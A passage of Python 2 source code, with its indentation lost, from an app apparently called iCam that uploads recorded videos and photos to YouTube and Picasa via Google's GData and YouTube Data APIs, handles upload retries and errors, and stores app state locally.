"Connection": "keep-alive",
#"Content-Type": "application/x-www-form-urlencoded",
"Content-type": "application/octet-stream",
#"Content-Length": "33"
}
# From http://forums.devshed.com/python-programming-11/httplib-urllib-how-do-i-keep-a-connection-open-142565.html:
# "there is a Connection: Keep-alive option that you can pass in the
# header, if you use HTTP/1.1 protocol."
try:
myHTTPConnection = httplib.HTTPConnection(youtubeProxyServerAddress)
#myHTTPConnection = httplib.HTTPConnection(youtubeProxyServerAddress, 8080)
fInput = open(pathFileName, "rb")
dataToUpload = fInput.read()
fInput.close()
#dataToUpload = "content=&img=CurrentSymLink_1.3gp"
myHTTPConnection.request("POST", pageOnServer, dataToUpload, \
httpRequestHeader)
# Get the response.
# From http://docs.python.org/library/httplib.html:
# "Note that you must have read the whole response before you can
# send a new request to the server."
httpResponse = myHTTPConnection.getresponse()
httpResponseString = httpResponse.read()
DebugPrint("YouTubeVideoUploadThroughProxy(): " \
httpResponseString = %s." % httpResponseString)
#Close the connection.
myHTTPConnection.close()
except:
#if MY_DEBUG_STDERR:
# sys.stderr.write(myText + "\n")
DebugPrintErrorTrace()
"""
"""
btMediaTimeStr is in the format "%02d:%02d:%02d.%01d %02d-%02d-%04d" %
(tm_hour, tm_min, tm_sec, int((numMilliseconds + 50)/ 100), tm_mday,
tm_mon, tm_year)
btMediaDateStr is in the format "%04d-%02d-%02d" % (tm_year, tm_mon, tm_mday)
"""
class FileObjectWithLenForGdataMedia(file):
def __init__(self, aPathFileName, accessFlags):
# From http://www.artima.com/weblogs/viewpost.jsp?thread=236275
# "super returns proxy objects"
super(FileObjectWithLenForGdataMedia,
self).__init__(aPathFileName, accessFlags)
self.len = os.path.getsize(aPathFileName)
"""
We use FileObjectBufferWithLenForGdataMedia to upload media files
(video to YouTube) via a VIRTUAL file (data kept in RAM) handle.
This is USEFUL because if we give the file directly to the GData
YouTube API, in some cases the file handle to the file is kept
after returning from the Insert...() call, making impossible to
remove the file after uploading it.
GData API details:
- Picasa:
def InsertPhoto(self, album_or_uri, photo, filename_or_handle,
content_type='image/jpeg'):
- YouTube:
def InsertVideoEntry(self, video_entry, filename_or_handle,
youtube_username='default',
content_type='video/quicktime'):
"""
class FileObjectBufferWithLenForGdataMedia(file):
seekOffset = 0
name = None
dataToUpload = None
#def __init__(self, aPathFileName, accessFlags):
def __init__(self, aDataToUpload, *args):
"""
if (MY_DEBUG_STDOUT):
print "Entered FileObjectWithLenForGdataMedia::__init__(args = %s)" % str(args)
sys.stdout.flush()
"""
"""
#"super returns proxy objects" - from http://www.artima.com/weblogs/viewpost.jsp?thread=236275
super(FileObjectWithLenForGdataMedia, self).__init__(aPathFileName, accessFlags)
self.len = os.path.getsize(aPathFileName)
"""
self.dataToUpload = aDataToUpload
self.len = len(aDataToUpload)
self.name = args[0]
def close(self, *args):
"""
DebugPrint("Am in FileObjectBufferWithLenForGdataMedia::close(%s)" % \
str(args))
"""
pass
def seek(self, *args):
DebugPrint("Entered FileObjectBufferWithLenForGdataMedia::seek(%s)" % \
str(args))
self.seekOffset = args[0]
def read(self, *args):
"""
DebugPrint("Entered " \
"FileObjectWithLenForGdataMedia::read(args=%s)" \
" (self.seekOffset = %d)" % \
(str(args), self.seekOffset))
"""
if len(args) < 1:
res = self.dataToUpload[self.seekOffset : ]
else:
res = self.dataToUpload[self.seekOffset :
self.seekOffset + args[0]]
lenRes = len(res)
self.seekOffset += lenRes
"""
DebugPrint("FileObjectWithLenForGdataMedia::read(): " \
"returning string of len %d, and made " \
"self.seekOffset = %d." % \
(lenRes, self.seekOffset))
"""
return res
################NEW
import httplib2
import random
from apiclient.discovery import build
from apiclient.errors import HttpError
from apiclient.http import MediaFileUpload
from oauth2client.client import flow_from_clientsecrets
from oauth2client.file import Storage
from oauth2client.tools import argparser, run_flow
# Explicitly tell the underlying HTTP transport library not to retry, since
# we are handling retry logic ourselves.
httplib2.RETRIES = 1
# Maximum number of times to retry before giving up.
MAX_RETRIES = 10
# Always retry when these exceptions are raised.
RETRIABLE_EXCEPTIONS = (httplib2.HttpLib2Error, IOError, httplib.NotConnected,
httplib.IncompleteRead, httplib.ImproperConnectionState,
httplib.CannotSendRequest, httplib.CannotSendHeader,
httplib.ResponseNotReady, httplib.BadStatusLine)
# Always retry when an apiclient.errors.HttpError with one of these status
# codes is raised.
RETRIABLE_STATUS_CODES = [500, 502, 503, 504]
# The CLIENT_SECRETS_FILE variable specifies the name of a file that contains
# the OAuth 2.0 information for this application, including its client_id and
# client_secret. You can acquire an OAuth 2.0 client ID and client secret from
# the {{ Google Cloud Console }} at
# {{ https://cloud.google.com/console }}.
# Please ensure that you have enabled the YouTube Data API for your project.
# For more information about using OAuth2 to access the YouTube Data API, see:
# https://developers.google.com/youtube/v3/guides/authentication
# For more information about the client_secrets.json file format, see:
# https://developers.google.com/api-client-library/python/guide/aaa_client_secrets
CLIENT_SECRETS_FILE = LOCAL_FOLDER + "client_secrets.json"
# This OAuth 2.0 access scope allows an application to upload files to the
# authenticated user's YouTube channel, but doesn't allow other types of access.
YOUTUBE_UPLOAD_SCOPE = "https://www.googleapis.com/auth/youtube.upload"
YOUTUBE_API_SERVICE_NAME = "youtube"
YOUTUBE_API_VERSION = "v3"
# This variable defines a message to display if the CLIENT_SECRETS_FILE is
# missing.
MISSING_CLIENT_SECRETS_MESSAGE = """
WARNING: Please configure OAuth 2.0
To make this sample run you will need to populate the client_secrets.json file
found at:
%s
with information from the {{ Cloud Console }}
{{ https://cloud.google.com/console }}
For more information about the client_secrets.json file format, please visit:
https://developers.google.com/api-client-library/python/guide/aaa_client_secrets
""" % os.path.abspath(os.path.join(os.path.dirname(__file__),
CLIENT_SECRETS_FILE))
VALID_PRIVACY_STATUSES = ("public", "private", "unlisted")
def get_authenticated_service(args):
flow = flow_from_clientsecrets(CLIENT_SECRETS_FILE,
scope=YOUTUBE_UPLOAD_SCOPE,
message=MISSING_CLIENT_SECRETS_MESSAGE)
storage = Storage(LOCAL_FOLDER + "upload_video-oauth2.json")
credentials = storage.get()
if credentials is None or credentials.invalid:
credentials = run_flow(flow, storage, args)
return build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,
http=credentials.authorize(httplib2.Http()))
# This method implements an exponential backoff strategy to resume a
# failed upload.
def resumable_upload(insert_request):
response = None
error = None
retry = 0
while response is None:
try:
print "Uploading file..."
status, response = insert_request.next_chunk()
if response is not None:
if 'id' in response:
print "Video id '%s' was successfully uploaded." % response['id']
else:
exit("The upload failed with an unexpected response: %s" % response)
except HttpError, e:
if e.resp.status in RETRIABLE_STATUS_CODES:
error = "A retriable HTTP error %d occurred:\n%s" % (e.resp.status,
e.content)
else:
raise
except RETRIABLE_EXCEPTIONS, e:
error = "A retriable error occurred: %s" % e
if error is not None:
print error
retry += 1
if retry > MAX_RETRIES:
exit("No longer attempting to retry.")
max_sleep = 2 ** retry
sleep_seconds = random.random() * max_sleep
print "Sleeping %f seconds and then retrying..." % sleep_seconds
time.sleep(sleep_seconds)
################NEW
def YouTubeVideoUpload(pathFileName, fileName, aKeyword, crtTime=None,
mediaTimeStr="", mediaDateStr="", aDeviceId="", cameraId=0,
aBatteryLevel=-1, aChargerStatus=-1):
"""
Note:
The fileName is the time when was given start recording (note that at least
on Symbian there might be a small delay before actually starting to
record).
The (YouTube) videoDescription represents the time we entered
UploadStateAndFileAndStoreState().
"""
global youtubeClient, youtubeClientAlreadyConnected
global YOUTUBE_TEST_CLIENT_ID, googleUsername, youtubeDeveloperKey
#aKeyword += " " + btNetSearchKeywords
DebugPrint("Entered YouTubeVideoUpload(pathFileName=%s, fileName=%s, " \
"aKeyword=%s, aBatteryLevel=%d, aChargerStatus=%d)." % \
(pathFileName, fileName, aKeyword, \
aBatteryLevel, aChargerStatus))
DebugPrint("YouTubeVideoUpload(): file size=%d" % \
os.path.getsize(pathFileName));
if WINDOWS_CE_OS_PYTHONCE:
DebugPrint("YouTubeVideoUpload(): WinCE doesn't have yet libssl so " \
"cannot perform secure connection to Google --> Bailing " \
"out without uploading video.")
return -1
if youtubeClientAlreadyConnected == False:
if gdataModulesImported == False:
ImportGdataModules()
connResult = ConnectToYouTubeGData()
"""
If connResult == -1 then don't continue (most likely bad
username/passwd).!!!!
"""
ytRes = 0
fInput = None
fInputAux = None
try:
"""
self.assertEquals(youtubeClient.developer_key, youtubeDeveloperKey)
self.assertEquals(youtubeClient.client_id, YOUTUBE_TEST_CLIENT_ID)
self.assertEquals(youtubeClient.additional_headers["X-GData-Key"],
"key=" + youtubeDeveloperKey)
self.assertEquals(youtubeClient.additional_headers["X-Gdata-Client"],
YOUTUBE_TEST_CLIENT_ID)
"""
# videoTitle = "my cool video " + str(random.randint(1000,5000))
# videoFileName = os.path.split(pathFileName)[1]
# videoTitle = pathFileName [: len(pathFileName) - 4]
# videoTitle = fileName[: len(fileName) - 4]
#videoTitle = fileName[:len(fileName) - 4] + "_" + aDeviceId
videoTitle = fileName[:len(fileName) - 4] # Should contain deviceId and cameraId
"""
#videoDescription = "description " + str(random.randint(1000,5000))
videoDescription = time.strftime("%H:%M:%S %d-%m-%Y ", crtTime) + \
aDeviceId + ", " + str(cameraId) #($mediaFileSize bytes)
# crtTime.tm_year, crtTime.tm_mon, crtTime.tm_mday, crtTime.tm_hour
# crtTime.tm_min, crtTime.tm_sec #fileName
"""
if crtTime is None:
videoDescription = mediaTimeStr + " " + aDeviceId + ":" + \
str(cameraId) # ($mediaFileSize bytes)
else:
try:
numMilliseconds = int(mediaTimeStr)
theRest = int((numMilliseconds + 50) / 100)
except:
theRest = "*"
#if MY_DEBUG_STDERR:
# sys.stderr.write(myText + "\n")
DebugPrintErrorTrace()
#videoDescription = time.strftime("%H:%M:%S.* %d-%m-%Y", crtTime) \
# + " " + aDeviceId + ", " + str(cameraId) #($mediaFileSize bytes)
videoDescription = time.strftime("%H:%M:%S." + str(theRest) + \
" %d-%m-%Y", crtTime) + " " + \
aDeviceId + ", " + str(cameraId) #($mediaFileSize bytes)
videoDescription += " " + "%02d%%" % aBatteryLevel + \
" " + "%d" % aChargerStatus
"""
import random
developerTag01 = "tag" + str(random.randint(1000, 5000))
developerTag02 = "tag" + str(random.randint(1000, 5000))
developerTag03 = "tag" + str(random.randint(1000, 5000))
"""
"""
developerTag01 = videoTitle
developerTag02 = videoTitle
developerTag03 = videoTitle
"""
"""
From http://osdir.com/ml/youtube-api-gdata/2010-02/msg00091.html:
"developer tags need to be between 3 and 25 characters"
"""
developerTag01 = aDeviceId + " " + str(cameraId) + " " + btNetSearchKeywords
developerTag02 = str(cameraId) + "**" #!!!!TODO use function RepairGoogleKeywords()
developerTag03 = aDeviceId
################NEW
youtube = get_authenticated_service([])
# From initialize_upload()
try:
body=dict(
snippet=dict(
title=videoTitle,
description=videoDescription,
tags=developerTag01,
categoryId=None #options.category
),
status=dict(
privacyStatus="private"
)
)
# Call the API's videos.insert method to create and upload the video.
insert_request = youtube.videos().insert(
part=",".join(body.keys()),
body=body,
# The chunksize parameter specifies the size of each chunk of data, in
# bytes, that will be uploaded at a time. Set a higher value for
# reliable connections as fewer chunks lead to faster uploads. Set a lower
# value for better recovery on less reliable connections.
#
# Setting "chunksize" equal to -1 in the code below means that the entire
# file will be uploaded in a single HTTP request. (If the upload fails,
# it will still be retried where it left off.) This is usually a best
# practice, but if you're using Python older than 2.6 or if you're
# running on App Engine, you should set the chunksize to something like
# 1024 * 1024 (1 megabyte).
#media_body=MediaFileUpload(options.file, chunksize=-1, resumable=True)
media_body=MediaFileUpload(pathFileName, chunksize=-1, resumable=True)
)
resumable_upload(insert_request)
except HttpError, e:
print "An HTTP error %d occurred:\n%s" % (e.resp.status, e.content)
return
################NEW
"""
aDuration = gdata.media.Duration()
aDuration.seconds = "10"
print "aDuration =", aDuration
"""
"""
#!!!!
# Set geographic location to 37,-122 lat, long
where = gdata.geo.Where()
where.set_location((37.0,-122.0))
videoEntry = gdata.youtube.YouTubeVideoEntry(media=myMediaGroup, geo=where)
"""
"""
See also
https://gdata-python-client.googlecode.com/svn/trunk/pydocs/gdata.media.html#Private
Alex: From C:\Python27\Lib\site-packages\gdata\media\__init__.py
private = True,
#Doesn't work - it gives AttributeError: 'bool' object has
# no attribute '_BecomeChildElement'
duration = aDuration,
'People & Blogs'
"""
myMediaGroup = gdata.media.Group(
title=gdata.media.Title(text=videoTitle),
description=gdata.media.Description(description_type="plain",
text=videoDescription),
keywords=gdata.media.Keywords(text=aKeyword),
private=gdata.media.Private(),
category=[gdata.media.Category(text="People",
scheme="http://gdata.youtube.com/schemas/2007/categories.cat",
label="People")],
player=None
)
DebugPrint("YouTubeVideoUpload(): myMediaGroup = %s." % myMediaGroup)
# return
# self.assert_(isinstance(myMediaGroup, gdata.media.Group))
videoEntry = gdata.youtube.YouTubeVideoEntry(media=myMediaGroup)
myDeveloperTags = [developerTag01, developerTag02, developerTag03]
devTags = videoEntry.AddDeveloperTags(myDeveloperTags)
"""
for dev_tag in devTags:
self.assert_(dev_tag.text in myDeveloperTags)
self.assert_(isinstance(videoEntry, gdata.youtube.YouTubeVideoEntry))
"""
"""
# <?xml version='1.0' encoding='UTF-8'?>
# <ns0:updated xmlns:ns0="http://www.w3.org/2005/Atom">
# 2011-04-08T08:15:05.000Z
# </ns0:updated>
print "videoEntry.updated =", videoEntry.updated
# Use updated instead. It is ONLY the recorded date (without time):
# <?xml version='1.0' encoding='UTF-8'?>
# <ns0:recorded xmlns:ns0="http://gdata.youtube.com/schemas/2007">
# 2011-04-08
# </ns0:recorded>
print "videoEntry.recorded =", videoEntry.recorded
#Somehow add
<ns1:location xmlns:ns1="http://gdata.youtube.com/schemas/2007">
44.419314, 26.159509 geo:alt=100
</ns1:location>
"""
newVideoEntry = None
# try:
if False:
fInput = FileObjectWithLenForGdataMedia(pathFileName, "rb")
fInputAux = open(pathFileName, "rb")
dataToUpload = fInputAux.read()
fInputAux.close()
fInput = FileObjectBufferWithLenForGdataMedia(dataToUpload, \
pathFileName, "rb")
"""
print "fInput =", fInput
print "fInput.len =", fInput.len
if isinstance(fInput, file):
print "fInput is of type file :)"
"""
newVideoEntry = youtubeClient.InsertVideoEntry(videoEntry, fInput)
# Normally fInput gets closed in InsertVideoEntry().
"""
except:
ytRes = -1
exceptionType, exceptionValue, exceptionTraceback = sys.exc_info()
errorStr = "Exception in YouTubeVideoUpload() - details: " \
"free_ram = %d. exceptionTraceback = %s, " \
"exceptionType = %s, exceptionValue = %s. " \
"Bailing out..." % \
(
GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)),
str(exceptionType), str(exceptionValue)
)
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(aDeviceId, errorStr, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint(errorStr)
DebugPrintErrorTrace()
return ytRes
"""
"""
# Doesn't work on Python 2.2 (e.g, PyS60 1.4.5)
finally:
fInput.close()
DebugPrint("YouTubeVideoUpload(): Closed the file (attempted to) " \
"uploaded to YouTube.")
"""
if ADD_VIDEO_TO_PLAYLIST:
# ################################################################
# Put the newly added video in the corresponding playlist (create
# the playlist if it doesn't exist)
# ################################################################
# playlistTitle = aDeviceId + ": " + \
# time.strftime("%Y-%m-%d", crtTime) + (", %d" % cameraId)
if crtTime is None:
playlistTitle = aDeviceId + ": " + mediaDateStr + ", %d" % \
cameraId
else:
playlistTitle = aDeviceId + ": " + \
time.strftime("%Y-%m-%d", crtTime) + ", %d" % cameraId
playlistDescription = playlistTitle
playlistToUse = None
"""
!!!!We require the YouTube alias/nickname which can be different
to the Google username!!!!!!!!
feed = youtubeClient.GetYouTubePlaylistFeed(
username="MultiEnder123") #NOT "ender123"?
"""
feed = youtubeClient.GetYouTubePlaylistFeed()
# Returns: A YouTubePlaylistFeed if successfully retrieved.
# print "feed =", feed
# print "feed.entry[0] =", feed.entry[0]
for myEntry in feed.entry:
myEntryTitle = myEntry.title.text
# print "myEntryTitle = %s" % myEntryTitle
#myEntry.id.text = \
# http://gdata.youtube.com/feeds/api/users/MultiEnder123/playlists/3FD3773F7AC5DD1E
# myEntry.id = <xml>...
myEntryIdStr = myEntry.id.text.split("/")[-1]
# print " myEntryIdStr = %s" % myEntryIdStr
if playlistTitle == myEntryTitle:
playlistToUse = myEntry
break
if playlistToUse is None:
# Create the playlist if it was not found.
# Returns: The YouTubePlaylistEntry if successfully posted.
playlistToUse = youtubeClient.AddPlaylist(playlistTitle,
playlistTitle, playlist_private=False)
# It seems this info is not used!
aVideoTitle = ""
# It seems this info is not used!
aVideoDescription = ""
playlistURI = playlistToUse.feed_link[0].href
# time.sleep(10) #!!!!!!!!!!!!!Maybe required
response = \
youtubeClient.AddPlaylistVideoEntryToPlaylist(playlistURI,
newVideoEntry.id.text.split("/")[-1], aVideoTitle,
aVideoDescription)
except:
#newVideoEntry = youtubeClient.InsertVideoEntry(videoEntry,
# pathFileName)
ytRes = -1
try:
if fInput is not None:
fInput.close()
if fInputAux is not None:
fInputAux.close()
DebugPrint("YouTubeVideoUpload(): Closed (or attempted to) the " \
"file uploaded to YouTube.")
except:
DebugPrintErrorTrace()
(exceptionType, exceptionValue, exceptionTraceback) = sys.exc_info()
errorStr = \
"Exception in YouTubeVideoUpload() - details: free_ram = %d. " \
"exceptionTraceback = %s, exceptionType = %s, " \
"exceptionValue = %s. Bailing out..." % \
(GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)),
str(exceptionType), str(exceptionValue))
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(aDeviceId, errorStr, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint(errorStr)
DebugPrintErrorTrace()
"""
Since we had an error when uploading to YouTube, then save the media
file to the Unsent folder.
# storeLocallyMedia == 0 because in case we don't store it THEN we
# save it in Unsent.
"""
if (storeLocallyMedia == 0) and (useiCamServer != 2):
if saveUnsentPackets > 0:
"""
Note: we could save this file in LOCAL_FOLDER_MEDIA, but in
LOCAL_FOLDER_UNSENT_FILES is more appropriate.
"""
MoveFileBetweenAnyDrives(pathFileName,
LOCAL_FOLDER_UNSENT_FILES + "/" + fileName)
TreatException("YouTubeVideoUpload()")
return ytRes
picasaClient = None
picasaClientAlreadyConnected = False
def ConnectToPicasaGData(aDeviceId=deviceId):
global picasaClient, picasaClientAlreadyConnected
DebugPrint("Entered ConnectToPicasaGData().")
try:
# Initialize the client
picasaClient = gdata.photos.service.PhotosService()
"""
picasaClient.email = picasaUsername
picasaClient.password = picasaPassword
"""
picasaClient.email = googleUsername
picasaClient.password = GetGooglePassword()
picasaClient.source = "iCam Client"
picasaClient.ProgrammaticLogin()
picasaClientAlreadyConnected = True
except:
(exceptionType, exceptionValue, exceptionTraceback) = sys.exc_info()
errorStr = "Exception in ConnectToPicasaGData() - details: " \
"free_ram = %d. exceptionTraceback = %s, " \
"exceptionType = %s, exceptionValue = %s. " \
"Bailing out..." % \
(GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)),
str(exceptionType), str(exceptionValue))
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(aDeviceId, errorStr, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint(errorStr)
DebugPrintErrorTrace()
"""
Example of exception that I am "hunting":
Exception in ConnectToPicasaGData() - details: free_ram = 15552512.
exceptionTraceback = [
' File "a.py", line 2132, in ConnectToPicasaGData',
' File "C:\\Python25\\lib\\site-packages\\gdata\\service.py", line 771, in ProgrammaticLogin',
' File "C:\\Python25\\lib\\site-packages\\atom\\http.py", line 163, in request',
' File "newcore\\Lib\\httplib.py", line 860, in endheaders',
' File "newcore\\Lib\\httplib.py", line 732, in _send_output',
' File "newcore\\Lib\\httplib.py", line 699, in send',
' File "newcore\\Lib\\httplib.py", line 1135, in connect',
' File "newcore\\Lib\\socket.py", line 79, in ssl'],
exceptionType = , exceptionValue = The connect operation timed out. Bailing out...
"""
if exceptionValue == "The connect operation timed out":
Quit()
return -1
#!!!!TODO: add in Picasa description aBatteryLevel, aChargerStatus.
def PicasaPhotoUpload(pathFileName, fileName=None, aKeyword="", crtTime=None,
mediaTimeStr="", mediaDateStr="", aDeviceId="", cameraId=0,
aBatteryLevel=-1, aChargerStatus=-1, aData=None):
global picasaClient, picasaClientAlreadyConnected
DebugPrint("Entered PicasaPhotoUpload(pathFileName=%s, fileName=%s, " \
"aKeyword=%s, aBatteryLevel=%d, aChargerStatus=%d)." % \
(pathFileName, fileName, aKeyword, \
aBatteryLevel, aChargerStatus))
DebugPrint(" PicasaPhotoUpload(): mediaTimeStr=%s, mediaDateStr=%s, " \
"aDeviceId=%s, cameraId=%s." % \
(str(mediaTimeStr), str(mediaDateStr), str(aDeviceId), \
str(cameraId)))
#DebugPrint(" PicasaPhotoUpload(): aData=%s ." % str(aData))
fInput = None
if picasaClientAlreadyConnected == False:
if gdataModulesImported == False:
ImportGdataModules()
ConnectToPicasaGData()
try:
# Give the album a unique title by appending the current time.
#test_album = picasaClient.InsertAlbum('Python library test' +
# str(GetTime()), 'A temporary test album.')
#albumFeed = picasaClient.GetUserFeed(kind = "album")
#albumFeed = picasaClient.GetUserFeed(kind = ["album", "photo"])
#albumFeed = picasaClient.GetUserFeed(kind = ["album", "photo",
# "comment", "tag"], user = "ender123")
# These don't work probably (just in YouTube's client case) because
# the gdata server doesn't answer requests to
# http(s)://picasaweb.google.com.
#albumFeed = picasaClient.GetEntry(
# "http://picasaweb.google.com/data/feed/api/user/" + "ender123") #None
#albumFeed = picasaClient.GetEntry(
# "https://picasaweb.google.com/data/feed/api/user/" + "ender123") #None
# print "albumFeed =", albumFeed
# albumTitle = time.strftime("%Y-%m-%d", time.localtime(crtTime))
# albumTitle = time.strftime("%Y-%m-%d", crtTime)
if crtTime is None:
albumTitle = aDeviceId + ": " + mediaDateStr + ", %d" % cameraId
else:
albumTitle = aDeviceId + ": " + time.strftime("%Y-%m-%d",
crtTime) + ", %d" % cameraId
DebugPrint(" PicasaPhotoUpload(): albumTitle=%s ." % str(albumTitle))
iCamAlbumFound = False
"""
From https://code.google.com/apis/picasaweb/docs/1.0/developers_guide_python.html#ListAlbums
(less important:
https://code.google.com/apis/picasaweb/docs/2.0/developers_guide_protocol.html#ListAlbums)
"""
# albumsFeed = picasaClient.GetUserFeed(kind = "album", user = "ender123")
albumsFeed = picasaClient.GetUserFeed(kind="album")
"""
# IMPORTANT NOTE: it does not print the album list - I believe
# BECAUSE THE tostring() METHOD DOESN'T DUMP THE ALBUMS LIST :))
DebugPrint("albumsFeed = %s" % str(albumsFeed))
"""
album = None
for album in albumsFeed.entry:
# print "album =", album
DebugPrint("Title: %s, number of photos: %s, id: %s" % \
(album.title.text, album.numphotos.text,
album.gphoto_id.text))
# picasaClient.Delete(album)
if album.title.text == albumTitle:
iCamAlbumFound = True
DebugPrint(" PicasaPhotoUpload(): found albumTitle!")
break
if iCamAlbumFound:
# print "Found"
iCamAlbum = album
else:
# print "Not found"
"""
!!!!IMPORTANT: Unfortunately this private argument gets translated
in Picasa in the attribute Visibility - "Anyone with the link".
Currently to fix this, the user has to go on Picasa and edit the
attribute manually.
Find a programatic solution...!!!!
"""
iCamAlbum = picasaClient.InsertAlbum(title=albumTitle,
summary="iCam photo album.", location="Bucharest", #!!!!TODO: make location configurable
access="private")
photoEntry = gdata.photos.PhotoEntry()
photoEntry.title = atom.Title(text=fileName)
photoEntry.private = gdata.media.Private()
#photoEntry.summary = atom.Summary(text=fileName)
photoSummary = "%02d%%" % int(GetBatteryLevelPercentage()) + \
" " + "%s" % str(GetChargerStatus())
photoEntry.summary = atom.Summary(text=photoSummary)
photoEntry.category.append(atom.Category(
scheme="http://schemas.google.com/g/2005#kind",
term="http://schemas.google.com/photos/2007#photo"))
photoFileNameExtension = str.lower(pathFileName[len(pathFileName)-4 :])
if photoFileNameExtension == ".jpg":
aContentType = "image/jpeg"
elif photoFileNameExtension == ".png":
aContentType = "image/png"
#if fileName != None:
if aData == None:
entry = picasaClient.InsertPhoto(iCamAlbum, photoEntry,
pathFileName, content_type=aContentType)
else:
#if fileName == None:
#assert aData != None
fInput = FileObjectBufferWithLenForGdataMedia(aData, \
pathFileName, "rb")
entry = picasaClient.InsertPhoto(iCamAlbum, photoEntry,
fInput, content_type=aContentType)
# TODO: check!!!! Normally fInput gets closed in InsertPhoto()
"""
'video/mp4' is from
https://code.google.com/apis/picasaweb/docs/2.0/developers_guide_protocol.html#PostVideo
(see maybe also
https://code.google.com/apis/picasaweb/docs/2.0/reference.html).
But although the documentation above says we can upload video, the
latest gdata API doesn't allow uploading videos on Picasa:
Traceback (most recent call last):
File "iCam.py", line 84, in testInsertPhotoUpdateBlobAndDelete
pathFileName, content_type='video/mp4')
File "C:\Python25\lib\site-packages\gdata\photos\service.py", line 396, in InsertPhoto
['image/'+t for t in SUPPORTED_UPLOAD_TYPES]
GooglePhotosException: (602, "Accepted content types: ['image/bmp',
'image/jpeg', 'image/jpg', 'image/gif', 'image/png']",
'This is not a valid content type: video/mp4')
"""
except:
try:
if fInput is not None:
fInput.close()
DebugPrint("PicasaPhotoUpload(): Closed (or attempted to) the " \
"file uploaded to Picasa.")
except:
DebugPrintErrorTrace()
#entry = picasaClient.InsertVideo(iCamAlbum, photoEntry, pathFileName,
# content_type='video/mp4')
# """
#self.assert_(entry.id.text)
#updated_entry = picasaClient.UpdatePhotoBlob(entry, pathFileName)
#self.assert_(entry.GetEditLink().href !=
# updated_entry.GetEditLink().href)
# picasaClient.Delete(updated_entry)
# In case there was an error when uploading to YouTube, then save the
# media file to the Unsent folder.
"""
storeLocallyMedia == 0 because in case we don't store it THEN we
save it in Unsent
"""
if (storeLocallyMedia == 0) and (useiCamServer != 2):
if saveUnsentPackets > 0:
"""
Note: we could save this file in LOCAL_FOLDER_MEDIA, but in
Unsent is more appropriate.
"""
MoveFileBetweenAnyDrives(pathFileName,
LOCAL_FOLDER_UNSENT_FILES + "/" + fileName)
(exceptionType, exceptionValue, exceptionTraceback) = sys.exc_info()
errorStr = "Exception in PicasaPhotoUpload() - details: free_ram = %d."\
" exceptionTraceback = %s, exceptionType = %s, " \
"exceptionValue = %s. Bailing out..." % \
(GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)),
str(exceptionType), str(exceptionValue))
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(aDeviceId, errorStr, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint(errorStr)
DebugPrintErrorTrace()
if exceptionValue == (403, "Forbidden", "Token expired"):
Quit()
return -1
def GetYouTubeUserProfile():
global googleUsername
userEntry = youtubeClient.GetYouTubeUserEntry(
"https://gdata.youtube.com/feeds/users/" +
googleUsername)
DebugPrint("GetYouTubeUserProfile(): userEntry.description.text = %s" % \
str(userEntry.description.text))
#print errorStr
return userEntry.description.text
"""
It is really mandatory to have both parameters fileName and pathFileName
because the callers can pass pathFileName with values
"D:/iCamTemp.3gp" (or pathFileName = "D:/iCamTemp.jpg", or
"D:/iCamTemp.amr")
and they should pass the useful names (e.g., 2011_01_10_13_50_00_100.3gp)
through fileName.
If (fileName is None) we only save state.bin.
We use (fileName == "[!NO_FILE]") to send only the state to the server
- e.g., used when wanting to send GPS info, but no media.
"""
if SYMBIAN_OS:
if _PyS60_1_9_OR_NEWER: #pyS60VersionNumber > 14:
mediaUploadedLock = e32.Ao_lock()
STORE_STATE = True
"""
stateMarshalled is None when StoreState() is NOT called from
UploadStateAndFileAndStoreState()
stateMarshalled - we can specify the state, s.t. we don't call
BuildState() anymore.
"""
def StoreState(aDeviceId=deviceId, stateMarshalled=None):
global STORE_STATE
if not STORE_STATE:
return
if SYMBIAN_S60_OS:
if SYMBIAN_3:
# !!Maybe do it even less often
if stateMarshalled is None:
"""
We call RedrawHandler() since normally it is invoked very
rare on S^3 devices (test S^1 devices!!!) - only at
the beginning of iCam 2-3 times and at Quit().
"""
RedrawHandler(None)
elif ANDROID_OS:
"""
After a few calls this might crash the Option Menu
(maybe the SL4A "server", as well) - and I'm stuck
"""
DisplayRedrawInfo(partialForAndroid=True)
if stateMarshalled is None:
#if aDeviceId is None:
#aDeviceId = deviceId
aCrtTime = GetCurrentDateTime()
stateMarshalled = BuildState(cameraId=-1, crtTime=aCrtTime,
numMilliseconds=0, fileName=None,
pathFileName=None)
try:
# if os.path.exists(STATE_PATH_FILENAME_BACKUP):
if os.path.isfile(STATE_PATH_FILENAME_BACKUP):
os.unlink(STATE_PATH_FILENAME_BACKUP)
except:
DebugPrintErrorTrace()
try:
# if os.path.exists(STATE_PATH_FILENAME):
if os.path.isfile(STATE_PATH_FILENAME):
os.rename(STATE_PATH_FILENAME, STATE_PATH_FILENAME_BACKUP)
DebugPrint("StoreState(): renamed %s to %s." % \
(STATE_PATH_FILENAME, STATE_PATH_FILENAME_BACKUP))
except:
DebugPrintErrorTrace()
try:
fOutput = open(STATE_PATH_FILENAME, "wb")
# fOutput.write(stateMarshalled)
fOutput.write(stateMarshalled.encode("zlib"))
# fOutput.flush()
fOutput.close()
DebugPrint("StoreState(): Wrote state file %s." % \
STATE_PATH_FILENAME)
except:
(exceptionType, exceptionValue, exceptionTraceback) = sys.exc_info()
errorStr = "Exception in StoreState() " \
"when writing locally stateMarshalled to %s - " \
"details: free_ram = %d. exceptionTraceback = %s, "\
"exceptionType = %s, exceptionValue = %s. " \
"Bailing out..." % \
(STATE_PATH_FILENAME, GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)),
str(exceptionType), str(exceptionValue))
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(aDeviceId, errorStr,
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT, None)
